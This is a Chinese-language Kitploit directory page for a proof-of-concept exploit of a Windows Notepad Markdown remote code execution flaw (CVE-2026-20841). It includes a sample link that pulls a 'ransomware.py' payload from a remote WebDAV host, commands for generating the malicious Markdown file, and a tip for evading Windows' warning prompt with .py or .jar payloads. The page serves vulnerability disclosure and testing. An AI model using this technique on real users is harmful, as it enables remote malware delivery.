Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-20841 — “Windows 记事本 RCE”的 PoC | Kitploit
工具/GitHubGitHub/tangent65536/cve-2026-20841
Payload生成漏洞利用钓鱼攻击
GitHubtangent65536/cve-2026-20841

CVE-2026-20841

“Windows 记事本 RCE”的 PoC

查看仓库
2137个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-20841 PoC

“Windows 记事本 RCE”漏洞的 PoC。

免责声明

  1. 我不是这个漏洞的发现者。向官方披露页面上列出的原作者致敬。我只是根据描述重新创建了这个 PoC。
  2. 我个人认为这个漏洞并没有看起来那么严重。触发它需要不止一次点击,除非目标系统满足特定条件。请参阅标准与限制部分。我重新创建这个 PoC 是因为它实在太有梗了。“记事本 RCE”听起来简直离谱。

描述

这个“漏洞”很简单。Windows 记事本的 Markdown 引擎不关心冷门的 URL 协议。作为一名恶意软件分析师,我读过许多关于基于 WebDAV 和 SMB 的载荷部署报告。根据这份文档,可以利用 file:/// 协议创建一个指向 WebDAV/SMB 服务器上文件的 URL。

root@kitploit:~
[BadLink](file:///\\webdav-payload-host@5005\DavWWWRoot\ransomware.py)

使用方法

我制作了两个脚本:一个用 Node.js,另一个用 Python。两者都会创建一个指向 WebDAV 载荷的 Markdown 文件。你可以使用 sample-payloads 文件夹中的示例载荷。

Node.js

node poc.js <webdav-server> <port> <payload/path/on/server>

Python

python poc.py <webdav-server> <port> <payload/path/on/server>

输出文件(poc.md)将出现在当前目录中。

标准与限制

  1. 大多数载荷文件扩展名(例如 .exe、.lnk、.vbs 等)仍然会触发内置警告,尽管记事本应用存在漏洞。这个警告来自 Windows 本身。至少就我所测试的,凡是在默认 OOB 安装上能导致代码执行的载荷,都会显示这个强制警告。
    fig01

  2. 如果目标设备安装了 Python 或 Java,你可以使用 .py 或 .jar 载荷来绕过警告弹窗。

安装补丁之后

fig02
现在点击该链接会显示一个新的警告弹窗。

其他

你可以从 Uptodown 找到存在漏洞的 Windows 记事本版本。记得检查安装程序的数字签名,并确保它来自 Microsoft。此外,你应该只在虚拟机中测试这个 PoC。

注意安全,玩得开心!

下载工具